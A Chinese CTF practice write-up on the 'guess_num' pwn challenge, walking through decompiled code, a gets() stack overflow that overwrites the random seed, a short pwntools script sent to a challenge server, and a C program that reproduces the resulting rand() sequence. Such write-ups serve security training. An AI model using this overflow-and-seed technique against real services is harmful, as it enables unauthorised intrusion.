PWN刷题笔记——guess_num

老规矩,checksec一下先:

然后扔进ida64看一下反汇编源码:

__int64 __fastcall main(__int64 a1, char **a2, char **a3)
{
 FILE *v3; // rdi
 const char *v4; // rdi
 int v6; // [rsp+4h] [rbp-3Ch]
 int i; // [rsp+8h] [rbp-38h]
 int v8; // [rsp+Ch] [rbp-34h]
 char v9; // [rsp+10h] [rbp-30h]
 unsigned int seed[2]; // [rsp+30h] [rbp-10h]
 unsigned __int64 v11; // [rsp+38h] [rbp-8h]

 v11 = __readfsqword(0x28u);
 setbuf(stdin, 0LL);
 setbuf(stdout, 0LL);
 v3 = stderr;
 setbuf(stderr, 0LL);
 v6 = 0;
 v8 = 0;
 *(_QWORD *)seed = sub_BB0(v3, 0LL);
 puts("-------------------------------");
 puts("Welcome to a guess number game!");
 puts("-------------------------------");
 puts("Please let me know your name!");
 printf("Your name:");
 gets(&v9);
 v4 = (const char *)seed[0];
 srand(seed[0]);
 for ( i = 0; i <= 9; ++i )
 {
  v8 = rand() % 6 + 1;
  printf("-------------Turn:%d-------------\n", (unsigned int)(i + 1));
  printf("Please input your guess number:");
  __isoc99_scanf("%d", &v6);
  puts("---------------------------------");
  if ( v6 != v8 )
  {
   puts("GG!");
   exit(1);
  }
  v4 = "Success!";
  puts("Success!");
 }
 sub_C3E(v4);
 return 0LL;
}

大概明白了,应该是v9栈溢出覆盖后覆盖seed[0],那我去查看一下:

可以看出,seed[0]与v9之间相差(0x30-0x10),payload就可以构造了!

from pwn import *
p = remote("111.200.241.243",50233)
p.sendlineafter("name:",b'a'*(0x30-0x10)+p64(1))
p.interactive()

覆盖的种子为1,那么我们再用c++写一个程序来跑一下我们所需要的随机数,注意linux环境下和windows环境下有所不同:

#include<stdlib.h>
#include <stdio.h>
#include <time.h>
int main(void)
{
  int i,j;
  srand(1);
  for(i=0; i<10; i++)
  {
    j=rand()%6+1;
    printf("%d ",j);
  }
  printf("\n");
  return 0;
}

那么,我们的flag就拿到了:

暂无评论

发送评论 编辑评论


				
|´・ω・)ノ
ヾ(≧∇≦*)ゝ
(☆ω☆)
(╯‵□′)╯︵┴─┴
 ̄﹃ ̄
(/ω\)
∠( ᐛ 」∠)_
(๑•̀ㅁ•́ฅ)
→_→
୧(๑•̀⌄•́๑)૭
٩(ˊᗜˋ*)و
(ノ°ο°)ノ
(´இ皿இ`)
⌇●﹏●⌇
(ฅ´ω`ฅ)
(╯°A°)╯︵○○○
φ( ̄∇ ̄o)
ヾ(´・ ・`。)ノ"
( ง ᵒ̌皿ᵒ̌)ง⁼³₌₃
(ó﹏ò。)
Σ(っ °Д °;)っ
( ,,´・ω・)ノ"(´っω・`。)
╮(╯▽╰)╭
o(*////▽////*)q
>﹏<
( ๑´•ω•) "(ㆆᴗㆆ)
😂
😀
😅
😊
🙂
🙃
😌
😍
😘
😜
😝
😏
😒
🙄
😳
😡
😔
😫
😱
😭
💩
👻
🙌
🖕
👍
👫
👬
👭
🌚
🌝
🙈
💊
😶
🙏
🍦
🍉
😣
Source: github.com/k4yt3x/flowerhd
颜文字
Emoji
小恐龙
花!
上一篇
下一篇